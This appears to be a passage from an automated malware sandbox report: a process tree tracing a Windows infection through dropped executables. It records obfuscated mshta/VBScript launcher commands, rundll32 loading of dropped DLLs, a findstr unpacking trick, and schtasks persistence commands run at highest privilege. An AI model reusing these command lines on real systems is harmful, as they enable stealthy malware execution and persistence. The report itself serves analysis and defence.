                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\zr6m_G1smxjPoUF79TfqxtCG.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\zr6m_G1smxjPoUF79TfqxtCG.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:7220
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\zr6m_G1smxjPoUF79TfqxtCG.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\zr6m_G1smxjPoUF79TfqxtCG.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:6828
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                                                                      WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5988
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:7128
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:6972
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:6988
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            taskkill -IM "zr6m_G1smxjPoUF79TfqxtCG.exe" -f
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                            PID:5892
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\W9YR7n8UVX6uSvVz0PKviPJT.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\W9YR7n8UVX6uSvVz0PKviPJT.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:2272
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 660
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:7200
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 704
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:5700
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 668
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:2148
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 704
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:5188
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\_uj7EQYuis5_EMMQSlaO2D6c.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\_uj7EQYuis5_EMMQSlaO2D6c.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        PID:5660
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\_Evpe5cKVQC4Qoou6zZSk_Dh.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\_Evpe5cKVQC4Qoou6zZSk_Dh.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:7276
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\_Evpe5cKVQC4Qoou6zZSk_Dh.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\_Evpe5cKVQC4Qoou6zZSk_Dh.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:7256
                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:5416
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmp1738_tmp.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\tmp1738_tmp.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:4812
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                                "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:7880
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:8016
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      cmd
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:7668
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                          findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                            PID:3168
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                            Esplorarne.exe.com i
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                              PID:4264
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:1728
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                      PID:5492
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:5224
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                              PID:2664
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                  PID:6276
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                      PID:7784
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                          PID:6312
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                              PID:6880
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                  PID:4880
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                                                                                      PID:3816
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                                                                          PID:4684
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                                                                                              PID:5724
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                                                  PID:1012
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                    23⤵
                                                                                                                                                                                                                                                                                                      PID:1228
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                        24⤵
                                                                                                                                                                                                                                                                                                          PID:8316
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                            ping RJMQBVDN -n 30
                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                            PID:1364
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:5276
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5065546.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5065546.exe"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:5820
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5457840.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5457840.exe"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                        PID:4188
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3617431.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3617431.exe"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:5100
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8468059.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8468059.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                            PID:4364
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\8886770.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\8886770.exe"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:5148
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\zWbZXulAXiAVOGwVGxeGjkjW.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\zWbZXulAXiAVOGwVGxeGjkjW.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4196
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                                                                                                                        WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        PID:5012
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:2596
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:5788
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                          taskkill -IM "zWbZXulAXiAVOGwVGxeGjkjW.exe" -f
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                          PID:4104
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:1676
                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                          schtasks.exe /create /tn "customer3" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\customer3.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                          PID:5168
                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                          schtasks.exe /create /tn "EUW_c7TXaKp_tmUDLcysxwVA" /sc ONLOGON /tr "'C:\Users\Admin\Documents\WriteJoin\EUW_c7TXaKp_tmUDLcysxwVA.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                          PID:5844
                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                          PID:3076
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:5864
                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:4788
                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                          schtasks.exe /create /tn "skBgq9nx6MkVkJFLhZlJe7qV" /sc ONLOGON /tr "'C:\Users\Admin\Documents\gz8JqYCLsZeloB3O2mVsEmbD\skBgq9nx6MkVkJFLhZlJe7qV.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                          PID:6680
                                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:7904
                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 783CF88C8D143B8CA12D1270C16668A6 C
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:7740
                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding DD45D1DF1E716F998640634AE1181570 C
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:7320
                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 3606ADD384D0562F95726A0473CDB5BC
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:7552
                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding B5CB720FAA7BB553163462B3B4BD10BE C
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:2608
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:9460
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:9532
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:10136
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b0,0x1e8,0x7ff82d3cdec0,0x7ff82d3cded0,0x7ff82d3cdee0
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:6068
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6e3ed9e70,0x7ff6e3ed9e80,0x7ff6e3ed9e90
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:8888
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --mojo-platform-channel-handle=1692 /prefetch:8
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:3304
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:2
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:9012
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2644 /prefetch:1
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:6776
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2624 /prefetch:1
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:5204
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --mojo-platform-channel-handle=2360 /prefetch:8
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:5816
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
